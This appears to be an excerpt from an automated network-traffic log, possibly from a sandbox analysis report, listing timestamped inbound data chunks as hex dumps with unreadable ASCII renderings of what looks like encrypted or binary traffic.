                          2022-01-13 19:22:56 UTC1025INData Raw: dc 9f 86 4d 6a 71 c6 4d 95 4e e4 a1 8d ea 84 89 00 12 96 c8 d3 6e 9d 9d 55 20 29 a5 49 a7 bc cf 66 95 f4 3d d1 ac f3 74 9a 7e a3 83 c5 45 4a c2 1c d6 ac 20 6f 12 b7 bf 53 67 d1 9e 34 1c 71 2f 55 3f e4 86 93 58 ce e1 0b c6 79 bb b3 a4 de 3c 26 60 f1 28 05 e4 7c 07 ff 31 8e 61 6c 85 b8 55 00 c7 aa 93 f9 c2 c1 5f 5e 23 31 da 57 82 42 34 0b cc 45 c9 ef 34 c4 30 15 d4 eb 30 5c 70 25 11 15 3e 2e 0f da 9a 3d 28 81 98 bc 79 3b a2 00 a8 99 9c 76 22 b6 cb 71 25 f6 43 aa 86 c3 15 09 87 b4 27 f4 49 8c 96 bc 94 ba 28 7b 2d 95 e1 78 7e 7c 19 1e d1 0c 45 4d 59 97 f0 af 8a 8f 5e 8b db 1f fe a5 bb 6b 8a 87 3f d1 67 03 25 1a 39 fa 5a 20 9e 6d 19 c9 71 d8 e6 c3 be 13 7d 55 69 05 24 41 0e fc c9 a4 a9 14 5f 67 1b c0 0f 06 e7 e3 b1 30 11 df 07 84 e5 8a 3a f7 24 f5 d4 e1 15 31
                          Data Ascii: MjqMNnU )If=t~EJ oSg4q/U?Xy<&`(|1alU_^#1WB4E400\p%>.=(y;v"q%C'I({-x~|EMY^k?g%9Z mq}Ui$A_g0:$1
                          2022-01-13 19:22:56 UTC1026INData Raw: b2 30 01 3c 39 f5 27 95 ee 62 3f bc c1 54 ed c7 00 9a de 51 e5 2b 9e 09 2a ac f1 ce 6d cf c4 db 10 4b 5a e7 24 7a be 18 e5 31 9a 74 b6 a9 a6 53 b0 f7 77 22 65 12 4e ed 22 51 03 e9 cb 75 25 f2 55 43 63 0c 5c 36 ef 4c d9 1a 6a fe 09 84 63 cd dc f6 5f 71 27 50 c5 fa 97 2b 6d 60 f7 dc 8f 47 27 0a 31 4e 38 42 2e 1d ea 3e 53 4c 78 75 ce 89 d1 77 3a a6 27 56 fc 92 da e7 2f 82 50 83 de 8a f5 0e fd be c4 c6 ce 49 46 78 d6 5a 5a 16 4d 5d 7a 6b 05 64 6a 5a 5e 76 be da 87 cf d0 bf 13 11 7c 31 9e 10 5c 99 95 a2 c6 1b 55 e0 8c 49 54 f5 6a 6e 20 b5 0c b9 4c dc 86 b6 37 85 6d da 65 8d e4 b4 28 d0 f6 ac 15 0c a5 7c b2 2c 1f 56 21 c8 58 29 3a 99 eb 2c 0e 88 fd b3 23 29 6f f0 ba ce e7 27 a9 59 35 42 d5 94 61 77 26 32 28 03 38 fb 6a 7b 32 19 d3 71 4f 3b e6 7f 77 4f 5e e9 3b
                          Data Ascii: 0<9'b?TQ+*mKZ$z1tSw"eN"Qu%UCc\6Ljc_q'P+m`G'1N8B.>SLxuw:'V/PIFxZZM]zkdjZ^v|1\UITjn L7me(|,V!X):,#)o'Y5Baw&2(8j{2qO;wO^;
                          2022-01-13 19:22:56 UTC1028INData Raw: 01 98 0b d6 9e 19 5a 3d 17 86 8d 5a 89 c0 df 08 22 56 0b c4 1d 54 86 57 69 1a bb 6a 3f 90 bf f3 ae 3b ac 3b dd 30 8e 9c dd ff ad a7 8d fc e2 39 bb 51 8d 56 1c 62 9d 91 f6 6f 1f 55 ad 17 5c f1 3c 23 98 01 11 7a 6b fd 53 5f 6d 14 d1 6d 86 3a eb 85 4e c2 c4 dc 25 c9 81 86 9d 2c 8b c0 dc 9a 9c d8 9a c4 12 a2 fc 52 cf 60 87 3c ea 8d 2a b6 cb 63 17 d6 bc dd b6 11 10 a1 31 9d 93 e1 3e e5 12 ed eb da 67 09 2d 8b be 61 35 74 70 48 74 ad b4 26 b7 c9 e2 5d b2 83 79 38 2a 05 84 24 3a 93 28 f0 c6 dd 1d e3 1d e3 43 1a be 70 da 9f 82 4a 97 7f 21 e8 7c 56 b8 2e 13 c1 17 96 c5 55 a5 2e 5a ec bf 44 b9 fc 21 e0 4e 6e cd 6a 80 51 13 bc 80 81 1b 0f 96 61 71 29 ed 1b d1 e6 6a 62 cc ef 2f 84 c0 b9 38 38 fb 7c fe 53 4a dc e7 cb 59 25 3b 10 00 a7 84 5b d3 3a 1d 71 e6 0a e3 19 cd
                          Data Ascii: Z=Z"VTWij?;;09QVboU\<#zkS_mm:N%,R`<*c1>g-a5tpHt&]y8*$:(CpJ!|V.U.ZD!NnjQaq)jb/88|SJY%;[:q
                          2022-01-13 19:22:56 UTC1029INData Raw: 94 64 41 98 0c fa 64 83 c6 c2 c9 b7 69 76 19 e0 8d ee aa 3d d5 63 a1 79 52 7f 83 be 6c 7a bc 65 03 f3 f3 b9 b1 9f 88 42 33 87 10 84 3e 8c 63 14 45 45 5b 19 dd 87 20 14 cd 2e 67 a8 01 f6 7f b4 c6 e3 10 40 37 a6 d8 40 5e 12 6f 15 cc f6 59 1c 70 0a 4c ad 0e 18 2d 2c 07 ea 8f 95 44 1c 79 3f b9 4b 9d 54 98 94 55 62 82 50 d6 e0 90 c0 26 15 42 6a e6 36 1c a6 2c 71 c9 41 a9 80 4d 53 84 96 1d 59 54 ee b0 23 f5 a0 1c f2 c5 3b 3b 1c 04 1c 77 fd f9 a5 76 84 50 c9 66 9d 5f bb 3d 1a 4f 5e f9 cf 75 5a e5 ca 6a fc 4a c3 54 e6 08 eb 5e 9d 6d 65 19 c0 d4 55 20 0a 31 a7 03 6e ec 52 24 03 51 84 ec df 17 aa 2a 0c 81 e3 75 bf 7c 61 66 f7 7e 90 74 b5 ab a1 26 97 60 e6 1f d2 f9 cb 6a 80 cf 5b d3 56 23 f1 5c 18 66 89 de 96 6c 3a 44 9a 63 e9 15 db 0b c9 63 cc c0 ac a4 31 37 85 0d
                          Data Ascii: dAdiv=cyRlzeB3>cEE[ .g@7@^oYpL-,Dy?KTUbP&Bj6,qAMSYT#;;wvPf_=O^uZjJT^meU 1nR$Q*u|af~t&`j[V#\fl:Dcc17
                          2022-01-13 19:22:56 UTC1030INData Raw: 18 36 ec b2 94 3d b8 fb dd 66 35 b6 26 7a b5 a4 91 bf e6 bf e1 5d 7c 47 15 bf e8 54 e0 46 d2 81 75 04 b3 b9 4f 52 7d ce 36 18 82 44 46 1a 57 01 98 52 d8 89 cc f3 5b 26 de 84 81 e0 f1 c8 f9 67 48 c5 bf 71 25 f7 d5 65 a3 c8 7a ba 0b 03 45 cb 64 2e 49 47 95 f3 b2 80 7a b4 37 bc cc 19 51 f8 57 94 e2 f1 a8 97 e8 04 4d 4f 94 7a d2 4e f0 ac 2a 1c 60 58 aa f5 dc 17 29 8d 2c 07 43 0c 7e b3 a5 84 42 9e fd 0c 57 aa 04 c3 91 d7 7c 05 04 26 fe 49 a0 22 72 a2 0e 54 71 a2 d5 74 75 f3 b9 cb 5b db 83 c5 92 62 e8 14 74 ad bc d1 74 21 b0 ec b5 0e 81 b4 c7 20 7a b1 54 85 65 5b 7b 5b 9b 68 91 f8 45 a0 11 10 44 5f c9 41 b1 b9 4b 47 ed be 1f f6 f4 79 25 f4 4c d1 aa 1a 0a 19 f1 ed 26 12 f5 fa 5e fc 5a f2 d1 38 c4 c4 6e b6 22 68 98 77 d3 75 b9 1a 7c 78 a0 6a 79 1a 68 88 53 51 fb
                          Data Ascii: 6=f5&z]|GTFuOR}6DFWR[&gHq%ezEd.IGz7QWMOzN*`X),C~BW|&I"rTqtu[btt! zTe[{[hED_AKGy%L&^Z8n"hwu|xjyhSQ
                          2022-01-13 19:22:56 UTC1032INData Raw: 47 ef 24 c5 d0 91 06 e4 a3 82 4b a6 a5 ef 88 00 a6 1f fe f6 2d eb ad 3b b8 41 bc d1 f7 fe c4 30 62 3a 47 5a f1 54 4a 26 7c 1f 54 11 bc d4 f3 a0 0c bf fb ca ee 2e b9 be bd 45 5b fa 72 1c b9 2a e0 e0 8d a1 c3 fd 65 75 bc da 2b 68 fa 4a 69 ae 41 b1 56 9b aa 93 58 61 0e 57 03 62 0f 03 37 ac 24 6a 3a 72 a3 96 69 b3 09 3e c1 a3 9a 05 67 1b 15 91 f4 4c 96 18 bc 7a 73 6b 17 4f ee d9 9e 44 3b 6d 1d 95 41 11 79 59 78 cd fe 18 44 93 97 f7 ce ea d4 68 6b 75 8d ee 0f 6c 26 06 57 d0 8d fe 0a 69 86 29 8d 00 43 44 46 c4 d5 d5 d1 19 95 f8 56 9d e2 e7 23 cd 2c 0d c3 cd 17 30 ce 84 bc de 6b 51 bc 5e 6a 2d e2 82 40 de 2b 3f 51 e8 4d 17 26 2d 46 7d a1 c1 48 d9 05 29 93 e3 01 5d 10 56 f5 61 d8 f2 22 6d 13 86 51 3c 8c e6 c0 a3 c1 51 69 b8 26 67 5e f7 9a 60 ea e6 ad a4 f9 13 a5
                          Data Ascii: G$K-;A0b:GZTJ&|T.E[r*eu+hJiAVXaWb7$j:ri>gLzskOD;mAyYxDhkul&Wi)CDFV#,0kQ^j-@+?QM&-F}H)]Va"mQ<Qi&g^`
                          2022-01-13 19:22:56 UTC1033INData Raw: 28 66 16 cf 2e 1a 6f 13 af 20 4c ad 7c 0c 96 07 3b 1a 7a 74 4a 1c 0f c1 1c 60 38 93 32 a6 05 6b 11 13 6f d3 2a 18 1f fe 97 4c 0a e0 98 3f bf 85 25 c7 2f 8c 37 a2 d7 e9 10 05 3a 7a b4 f8 a2 31 cb 71 79 3e ed 82 7f 9f 91 a0 1b b6 a9 2f ab a7 ec fc 48 dd ad 67 8a 1a 6e 37 46 9a 6e 93 f8 14 3a 43 bc 81 2c 05 32 f9 0f ce 5c 13 6b 5d 65 0d d4 9b 92 76 a6 44 3c 36 8f 8b 0c 39 b1 c8 50 d6 9f 67 d6 e4 be 13 be 67 ed e0 e2 31 0f 99 e1 1b f6 36 16 b3 5a ed 33 32 b5 00 d3 72 a4 13 39 6d 13 b7 a5 2c e8 ba d7 a5 05 24 7a a2 1c cc d9 c7 81 c3 56 e9 48 9a ec 0e dc 1d 09 a3 8a 2d 3f a3 93 f4 9c 5e 6d a3 09 70 cb 77 31 8c c0 3d e9 22 6d 0a df b6 83 50 bd 24 65 8c fc 52 c6 30 da f0 5e 36 5d 31 74 d3 74 c8 49 3e 91 be c6 c0 d1 72 04 59 35 85 c9 70 c5 19 c7 f5 20 fc 3d c9 1a
                          Data Ascii: (f.o L|;ztJ`82ko*L?%/7:z1qy>/Hgn7Fn:C,2\k]evD<69Pgg16Z32r9m,$zVH-?^mpw1="mP$eR0^6]1ttI>rY5p =
                          2022-01-13 19:22:56 UTC1034INData Raw: 7c b5 2f d4 85 86 55 37 a8 fc c1 14 5b 7f d0 8f 98 7a b8 61 7e ac 85 76 f3 c9 6f 0d a9 8e 17 53 5d 6a ca f4 da 69 68 f5 50 73 71 31 9a 60 95 f5 0c ca e6 ad e0 ed 71 22 61 19 83 c9 7b 4f 81 1d 51 8e e4 c9 c3 f6 16 4e ca e2 e5 28 8c af b3 b2 a9 3b 17 91 f4 56 e1 a7 43 a2 63 1f 75 8b d4 fd 80 5b db e9 f6 3b 31 32 4b 42 2f 92 08 bc 8b 56 e7 3b ff d5 32 7f 50 79 7b 33 84 52 bc b5 2c 9f 75 48 c8 fa ff 1c e9 4a d5 6d 1d 7d 37 a1 88 e7 f8 cc 0e 96 3c 5e bd 06 6c 90 79 37 a6 4a 61 46 85 11 89 35 0e fe 12 46 cc f7 9f 9a 0f 00 42 60 f0 af b9 41 a3 29 07 30 13 73 8f ab b7 ab af d3 eb 9b e8 a0 02 b2 53 5d 33 2e 13 cd c9 d3 3c 3f a0 1d b1 a9 f8 4e fb 39 a7 90 c1 fe 19 d9 0d c2 b5 0e 9a 0f a2 0c 6d 5e ff d2 ad 97 71 1b 93 b7 a4 46 c9 1b 84 50 bb 21 e9 3f 09 e5 d7 be 15
                          Data Ascii: |/U7[za~voS]jihPsq1`q"a{OQN(;VCcu[;12KB/V;2Py{3R,uHJm}7<^ly7JaF5FB`A)0sS]3.<?N9m^qFP!?
                          2022-01-13 19:22:56 UTC1036INData Raw: 2d 49 24 d1 ce 13 a8 58 f9 86 50 91 ec e1 17 8c 43 f5 c7 2a 1b 77 b2 d9 19 c3 58 9a 3a 24 63 36 b2 08 eb fb 52 1b 44 07 7a 66 5d 1c 0b 9f 1c 0e df 14 32 8e 2e 6a c7 69 77 3f 6e 02 a2 0b 39 7a 0a 79 52 3c 99 e6 d6 93 ef 75 a0 62 10 a4 02 dc 94 7c 1e 83 29 ff cd 6c 05 84 53 3b a2 03 b8 d2 13 ad a5 9d 95 67 a8 04 b6 88 8b cd b7 b6 23 f7 d1 24 28 de c3 18 55 4e 94 07 41 fb c8 99 fb b0 b5 b5 0a b8 4f 5a ec aa 4b df 4d 20 2b 6e ae 44 d7 ff d0 f5 c2 7f 37 d2 1c 78 c0 68 ff c1 42 39 de 61 4b 06 b3 ab ba d8 ea 0f 24 66 8a 50 d6 00 8e 11 19 33 91 6a 91 18 40 f2 a8 13 97 f0 fb dc df b7 55 71 77 bd d2 ec bc c3 5f 73 0b 9f 91 e1 94 49 05 37 a1 90 7a cc 75 b1 91 f9 d1 65 64 db a6 ba e6 a7 9c 07 2d 4b 10 54 ee 27 a9 e8 e5 2d dd 08 24 c2 c9 79 22 62 ea d6 9a a9 c5 41 a1
                          Data Ascii: -I$XPC*wX:$c6RDzf]2.jiw?n9zyR<ub|)lS;g#$(UNAOZKM +nD7xhB9aK$fP3j@Uqw_sI7zued-KT'-$y"bA
                          2022-01-13 19:22:56 UTC1037INData Raw: e5 36 5a f4 b4 30 d3 c9 26 79 3e 2c 57 67 5c f1 fa e4 e5 34 19 cd 30 10 1c 67 d5 91 b7 a8 0f d5 30 01 63 0f 15 79 b9 51 58 ed 46 c5 3b b6 ef de 13 c3 5c e5 6f 13 84 51 9d 36 a6 4c ce b2 32 d9 e1 a2 40 30 57 74 61 96 b2 67 0c a7 90 b0 ca 32 56 e9 63 1b 35 72 6f 4d 5e a6 0e 86 e4 77 71 2c 5a f2 8f 0e 91 a4 1d a9 9c ce 1b 2f de 8b 85 c9 b8 8a 88 15 ce bd 50 13 34 c2 84 4f 17 c6 07 d9 36 91 f6 08 b3 e6 3f 5d 48 8a cd c5 16 4b 4e c2 cb a6 4a d7 1a 38 38 70 af 00 00 e1 0a b2 2c 7a df 03 e4 ef 28 03 7a b5 11 aa 3c 52 49 a3 d7 00 be cc 84 52 62 d6 9c 13 4f f6 1d fc 5a fb ac 42 21 19 c7 69 1e cb c8 a0 1a 77 22 20 7e b5 bb 42 5e f1 c3 0d dd 19 8b c4 94 6e 35 77 7a a5 88 44 58 96 7d 60 ae 20 6b ba 06 04 f1 34 b5 0f 0a c2 75 b5 e0 9d 8b da f4 41 01 6d 18 4c 82 59 cb
                          Data Ascii: 6Z0&y>,Wg\40g0cyQXF;\oQ6L2@0Wtag2Vc5roM^wq,Z/P4O6?]HKNJ88p,z(z<RIRbOZB!iw" ~B^n5wzDX}` k4uAmLY
                          2022-01-13 19:22:56 UTC1038INData Raw: d4 0f cd 76 a8 a4 19 8e 3f d1 ca e8 e9 6c 6f ff 54 b6 03 6a 83 af f3 d9 5f 29 8e 7f 2e cb 14 e5 fe 40 dc 53 41 59 aa 31 2a 02 b2 48 72 97 fb db 1f 40 50 bd 40 60 e1 0b cb 83 d9 b6 6f 6b fe e7 6b db 58 98 1f bc dc 72 e1 1e 60 0c 88 2a eb fb a9 72 6b 7e 0f 07 47 51 7f 28 18 e5 7e d3 83 32 a7 98 16 ec e5 2c 1a 7c ab 48 d8 9c 0f 7a bd e8 d8 32 f5 de 95 f5 76 18 33 24 08 ba de 9e ee 55 1f 5a 53 42 24 7e 51 38 44 91 19 db 1f fd 32 52 be 70 4f 4e db 14 ba 8c 3c c6 52 ce ec ad 40 4c ab 11 98 74 b6 25 1c 18 38 cd 29 8e 72 a8 f1 fe 25 10 0d d7 04 b0 9c 34 6a 23 93 f1 2d 96 c3 71 41 54 5c e7 35 92 82 5c 83 7b de 93 e5 26 d3 73 5b 9e aa 26 70 ab 4f 54 9f 67 81 c2 c5 4c 3f b8 42 d3 fa 46 de 82 aa 31 fa b8 ba c2 df 19 31 92 27 88 4e bc dc 9e 06 5e e0 3a 6a 99 14 40 ac
                          Data Ascii: v?loTj_).@SAY1*Hr@P@`okkXr`*rk~GQ(~2,|Hz2v3$UZSB$~Q8D2RpON<R@Lt%8)r%4j#-qAT\5\{&s[&pOTgL?BF11'N^:j@
                          2022-01-13 19:22:56 UTC1040INData Raw: 40 31 fb 0d 7a 8f 85 89 61 c7 a2 e0 bf 3d 90 63 ee 76 4e ca 25 96 e7 17 05 df 1a 31 57 d7 0f 16 b2 1f b7 d9 39 4f 8e d9 27 bc 5b 03 c6 0a 57 4c 48 49 3d 78 7a 5b 4f 0d ec 23 9f 5c 46 cd 3a ea 5c 5a 3a 90 73 69 60 90 80 8c bb 46 1b d8 35 8f 29 35 9f 27 a0 3b a2 0e 76 e9 2f 99 bb 39 33 7c 9b 97 63 97 d6 e0 81 c3 25 e0 54 b9 53 42 79 49 db b0 33 fc e4 6f 0f b5 ab ba a5 8a f4 03 3e 3b 46 05 bd 17 84 0d 6a b4 68 51 5d 64 5c ea 74 a7 ae 30 0b d8 e2 0c 42 83 d5 1f 84 dd 51 2d 1e 86 4e bb 5a f0 ee 43 b7 f6 55 3f 24 f7 cd c8 16 48 d9 3b 3b 14 5f 19 75 b9 21 90 69 1f 7f 69 02 d6 82 54 9e 5c 97 a1 1c 8c 71 45 5d 76 cf 7a 88 e7 e6 ec fe fa ef 2c a1 e6 f0 c6 d9 a7 ee c7 c8 59 01 2d a4 80 a1 f2 ee 56 f2 3a b0 cd 15 b0 3c 30 be 62 b8 40 33 90 0f 98 7f e5 c7 7e b3 cf 6c
                          Data Ascii: @1za=cvN%1W9O'[WLHI=xz[O#\F:\Z:si`F5)5';v/93|c%TSByI3o>;FjhQ]d\t0BQ-NZCU?$H;;_u!iiT\qE]vz,Y-V:<0b@3~l
                          2022-01-13 19:22:56 UTC1041INData Raw: 22 5a ac ff 9f 73 fc 0d 60 c0 94 b5 be 48 a7 dd 58 ed 7a fd 0f bf 40 4e 08 7c dc e3 b3 ba 28 13 a4 49 e3 90 1f 05 f1 8c 6b 78 b0 91 88 bb 43 a6 0b d3 d4 21 dd a2 15 d3 7e c4 7a 20 5c 4e d7 18 31 7c 81 db 09 22 99 4a 3d b2 4c 37 94 70 be c4 68 38 49 44 4f e7 e8 b5 b6 38 5d d4 bb 26 3e 20 27 82 29 ea ad ad ad ad bc 29 4a a5 78 77 78 55 f2 f8 f6 7d 5b 7c 2c e4 f2 3f b1 b8 9b 18 a8 5c 92 c6 33 da e0 92 73 3c c9 64 8b c9 d3 bc b0 c7 be 83 a3 cc 93 f1 65 09 26 62 31 4a af 10 88 0b be 8a 03 e7 cc 4f ef 2b 9b e1 17 db 09 6b f5 e0 d7 d6 7f c0 93 ba bc af d3 60 65 1d e8 b4 da 52 a2 b7 64 cf 26 31 64 18 b9 83 81 a8 18 a8 4f 4d 4f fd 7c 2c 7d 3a 29 c4 06 3e 2b 43 4d 88 11 9c a8 fd cb fe bd 58 7a 5b 62 fd 7f 29 ec cf e6 52 df cc 0f 0e f6 54 e2 95 ef 65 1e 63 09 82 81
                          Data Ascii: "Zs`HXz@N|(IkxC!~z \N1|"J=L7ph8IDO8]&> '))JxwxU}[|,?\3s<de&b1JO+k`eRd&1dOMO|,}:)>+CMXz[b)RTec
                          2022-01-13 19:22:56 UTC1042INData Raw: 0e d6 32 98 06 19 77 0f da 9c 1d 82 45 45 1c 7e a4 f8 86 29 25 84 51 31 39 56 d2 ec b0 24 10 42 02 0e a5 9b 11 02 fa 0a 14 ea b3 5e 36 26 01 29 83 af d4 87 46 5d 46 de 9c 1d 87 d0 89 c2 7a 69 59 8b 45 a3 8e 1f 71 d2 cb 15 7e c0 b3 d9 7e f5 00 1d 9a 3f ad 68 6b 01 aa 2d 85 cb 6c bc 72 67 57 0e ed 8f cd f7 2d f2 fa 7f da 92 75 2e dc 9c 0d 70 b9 ac 05 61 0f 07 7b 32 36 4e 40 0a ee 70 f2 17 27 3e 7e 2d a8 45 99 95 c8 b9 b4 1e fd b9 6a 23 97 51 47 d3 c2 a4 72 f9 5c 78 c7 ce 9d 07 23 1e 7f c7 26 66 2c 8e d7 03 bb 1e 77 b5 e5 38 98 70 c3 12 57 c1 03 47 f8 4a de ca f5 6f 43 c3 a7 66 cf 1a ce ad ac 6c fe b2 7d 42 7c d2 4f 04 df 5c e9 63 f1 e6 e7 79 f4 e8 19 d8 36 19 9e 4a d2 19 21 1a 74 1c 20 69 bd 1a 67 e7 36 bd 10 57 c3 14 2e e0 8d be 9b e2 31 ce 9d 30 92 24 0d
                          Data Ascii: 2wEE~)%Q19V$B^6&)F]FziYEq~~?hk-lrgW-u.pa{26N@p'>~-Ej#QGr\x#&f,w8pWGJoCfl}B|O\cy6J!t ig6W.10$
                          2022-01-13 19:22:56 UTC1044INData Raw: dd 47 1d f8 e4 c0 bc 78 df 59 01 c3 32 1e 31 f3 78 d8 e4 e3 69 a0 70 c5 2c b5 7b 2e 07 31 3c c4 c5 b0 29 f4 07 33 3f c9 d1 6d 8b 91 f9 65 66 8e d6 93 97 ae 37 0b a0 77 9a 15 8b b2 81 b7 b9 14 26 99 80 3e 72 c2 30 7b 56 9f 3e a9 83 d6 9f 1b 5b 10 a0 0d 8e 3a 2b 1d 92 9b e8 ff 99 f1 99 96 7e 0b c3 0d 8f e4 37 c8 9b 16 58 f4 03 24 d5 11 aa 8f 85 82 2f 2a 68 94 30 6a 2a 66 eb 78 db b9 28 71 43 53 0c 48 ca e0 3b 16 32 ff d3 d0 ab b2 a5 ef d0 ff b2 7a b4 a5 f0 bc 67 19 22 3f b6 90 18 21 48 cb 3d fb d2 6b 68 fb 3f db 44 54 0d ab bb 1d 88 ec cf 15 9d fb 3e 50 be b0 cb 9d 83 cb 7c 2f 7d 45 b0 27 18 19 dd 82 2f 7d 3a 8d bc c4 7c dd 15 32 00 f3 94 63 97 88 2e e1 0e 3f f5 c2 70 c7 1d 00 df 59 05 83 a9 80 19 a8 f0 de ec e5 58 5b 08 cd 0e ab bd 45 4d 41 2d 6d 70 4f 59
                          Data Ascii: GxY21xip,{.1<)3?mef7w&>r0{V>[:+~7X$/*h0j*fx(qCSH;2zg"?!H=kh?DT>P|/}E'/}:|2c.?pYX[EMA-mpOY
                          2022-01-13 19:22:56 UTC1045INData Raw: da e7 25 c2 b3 b2 3c c3 8e 75 78 ef eb a1 34 7d 44 94 29 f6 dd f3 d5 84 96 c4 ed 68 fd 4b 26 71 97 46 c7 2c 70 14 b8 e6 d4 10 8c 1b fe 4b 4d cc f7 2a 98 8a ec 1d 63 1f e0 c3 ab 0a b9 f0 ad ba 9c 7b ae b2 88 4c dc 83 d2 c4 69 06 b9 3d bd 4c 97 9a ea da e0 cd 6a ea d7 52 d7 4b 4e c7 6a 7f 1b 9b a0 52 8f 2a f0 16 f0 b3 1d c0 6d fe 74 7f ae b0 33 38 91 9e e5 59 08 07 1e 3c 4f c3 ef 57 8b d1 1c 2b e3 ae 21 88 4b 54 a8 68 c7 69 7f 6b a7 85 ab c4 d8 73 36 14 4c 60 22 0e 18 83 f2 7f a7 0f cb c8 00 d5 38 8a dc f6 df 73 d7 27 13 d1 12 12 38 c4 a4 b5 01 33 0f 7d 58 1a 66 ec f3 bb d7 e1 77 b8 d5 01 b8 85 ab 4e b3 f1 54 08 51 42 64 f0 53 b6 5a a6 6d f6 a0 65 5e 95 48 2e 61 27 87 61 c7 14 11 cf 8c 98 29 d3 bf d0 b7 a5 24 67 9a 31 92 c7 1f 7b de 8d 09 39 e1 40 33 33 7f
                          Data Ascii: %<ux4}D)hK&qF,pKM*c{Li=LjRKNjR*mt38Y<OW+!KThiks6L`"8s'83}XfwNTQBdSZme^H.a'a)$g1{9@33
                          2022-01-13 19:22:56 UTC1047INData Raw: 33 93 54 24 0b 2f 4e 9e 1a 2f 34 39 f6 96 e1 ac 36 b5 0d b1 f6 e8 5e 04 b7 bf f0 b4 af 18 4f e7 10 17 96 09 9a 2b 83 23 1a 84 eb 6c 2b 6b 94 83 cd 67 44 db b9 c1 e7 2a 70 e4 59 df 9c b5 b6 ae 72 57 d8 0b 72 b8 38 78 37 3c 96 c9 6c f9 5a 8c 6f 61 da dc a9 30 4f 63 9a 30 2c 9f d2 c0 43 ec 84 df 4a c1 41 89 c3 50 d6 38 ec c7 da 4f 1b 8c fa ef 2f 9b ec 03 36 4d 8e c3 b8 3c 6b 5d 38 84 72 e9 e3 03 20 c0 86 5e be 68 38 35 c5 0e d3 44 6e 5c 58 2f 36 b4 27 80 ef 22 9f 86 51 28 18 5f 29 35 e5 3e 35 30 a6 7a be ca ee f9 d0 91 25 55 06 b2 3f a6 0b d1 f6 aa 2e 14 e0 52 bc 9c ea c5 40 2a 10 17 8c 5f 61 d1 a7 8a 36 bd dc e3 19 d3 6b 74 b7 fd c0 cc f3 52 b4 a0 70 b7 94 90 66 9a 2b 60 96 7b 24 e6 10 20 65 08 b5 de 32 af 33 f4 5b fd 56 ff de 05 49 d9 68 92 75 ae 2b 9d 11
                          Data Ascii: 3T$/N/496^O+#l+kgD*pYrWr8x7<lZoa0Oc0,CJAP8O/6M<k]8r ^h85Dn\X/6'"Q(_)5>50z%U?.R@*_a6ktRpf+`{$ e23[VIhu+
                          2022-01-13 19:22:56 UTC1047INData Raw: 25 82 f2 85 93 96 e1 41 c6 94 1a b8 83 b9 5f 66 9a 7d 37 50 91 f3 c7 7c 59 6e 9c 1c cc 4e c0 cc f7 d6 ff 93 18 23 e3 d1 5c f2 52 65 dc e9 45 58 e6 81 c8 ed 81 0b a4 a9 5d 2d f5 6c c9 10 11 bb 88 a5 f2 5e e0 89 dd 12 67 43 a3 88 4a b3 b9 54 e3 55 b6 35 90 78 ab 62 0a bc c0 df b9 a6 07 3f bb 53 2c 7f af ab ef 14 59 6c 78 71 59 0c 46 18 63 05 36 f2 80 31 3b 78 df a3 00 b4 3f b0 91 03 c7 68 17 c7 7d 22 26 54 33 0e 46 c7 60 69 bd 53 40 34 1a 19 a4 66 92 d9 3c 2b 86 e2 45 20 13 c5 f6 66 86 5e 4c 14 3f 58 38 71 79 8c b1 bd 89 ca e7 24 37 87 7f a6 14 ff 90 01 c1 93 fb ac 86 e5 2f 99 e4 ac 5e 6c 32 3d c8 e6 a7 f9 14 ec c2 9a 63 04 ab 74 43 8c 2f 95 f1 3a 21 fb da 90 e4 1d f7 c7 8a 8c 2c 45 3a 2d 97 a6 15 d6 61 a7 85 a5 7a 70 35 95 ef 20 1a 71 24 56 e8 b0 c4 07 44
                          Data Ascii: %A_f}7P|YnN#\ReEX]-l^gCJTU5xb?S,YlxqYFc61;x?h}"&T3F`iS@4f<+E f^L?X8qy$7/^l2=ctC/:!,E:-azp5 q$VD
                          2022-01-13 19:22:56 UTC1048INData Raw: b9 fd 96 4d 89 6d c2 fa da 74 be 61 f0 28 a9 1f 5e 26 56 71 0c 2f aa 2d 3d a4 b8 a5 31 30 51 07 f7 d8 80 40 29 ce 67 3b ea 69 55 2e f0 69 52 74 9f dc 53 30 db bb 1c 89 55 b2 52 0c 9f 1a 3c 54 40 29 10 a5 f8 fd cd 88 3b a9 e4 15 dd 0a 5f b2 28 b4 30 73 24 6d 68 6b 59 64 88 4b 30 7b 96 30 62 25 67 37 be ca e0 0a f2 5d c8 d0 89 38 cf 72 b9 45 e7 9c 61 38 87 3d aa 67 b8 f6 a3 57 16 5a 91 97 e7 d2 42 34 02 18 97 97 1f 32 7b d2 03 22 72 a0 a0 77 50 90 14 3e 27 96 c8 f3 c1 be 0b bb b2 0b 7f 19 8a 52 d3 62 8e 3b 04 0b db 9e 9e d6 f1 21 ee 1a b4 7e d7 06 b2 65 c6 38 3b d0 fe 3b b3 71 9f 80 37 a2 70 a7 4f b0 f7 72 ac 77 30 d0 13 14 02 b0 74 ba 1d 0c 61 3c 30 52 d4 3f 5b 4b 15 dc c5 5e 3b 14 7a ef 23 e4 af fb 75 93 c4 43 54 d4 6a 2e 39 fb 46 26 56 e5 0f 58 7e 7b 5e
                          Data Ascii: Mmta(^&Vq/-=10Q@)g;iU.iRtS0UR<T@);_(0s$mhkYdK0{0b%g7]8rEa8=gWZB42{"rwP>'Rb;!~e8;;q7pOrw0ta<0R?[K^;z#uCTj.9F&VX~{^
                          2022-01-13 19:22:56 UTC1050INData Raw: 6d 0c f7 20 69 1e a7 9a 03 36 10 58 2f 76 aa 25 e2 91 f4 d1 2c 8a fe 23 95 12 f4 38 bd ac 4a 6d a8 9d 28 b7 d2 5f 2a 87 67 cb 0d 5d 02 ca 73 c5 d3 e9 c0 ab ef f0 a8 16 47 5b 26 22 b8 7c 74 9b fb b2 94 45 28 0d aa 8a 5d d7 73 58 51 63 49 3d 3d 1b 91 06 66 c0 a7 08 c7 12 2f 4d b0 46 de 9b f2 5e 6a 78 c9 7f 15 d6 8d fc ba 06 ca a3 40 b1 7a f0 7a 88 70 d7 7f 6f 02 06 cf 10 f0 8f a4 9b 51 b4 4b a6 c6 99 06 23 1a 1e f8 3b 47 7a fd ac 39 1e 04 6b ba b1 b1 b4 36 04 17 67 61 13 bd 48 98 67 00 b8 90 a5 ec ec 6c 1c ba 95 3e e5 b5 73 61 d2 d1 9d d8 3f da 1c 65 63 e3 45 3c 99 eb 7a 34 b2 80 3c 92 49 15 55 f4 3a 5d d1 93 92 d1 92 75 77 51 1c 18 fa dd 12 34 64 15 2f f6 57 77 31 87 dc 36 de ec e4 f7 9f 42 cb ad e3 5e 37 1c 4d 91 9d cf 25 2e 20 0b 6a 9f 19 66 fb 40 4d 31
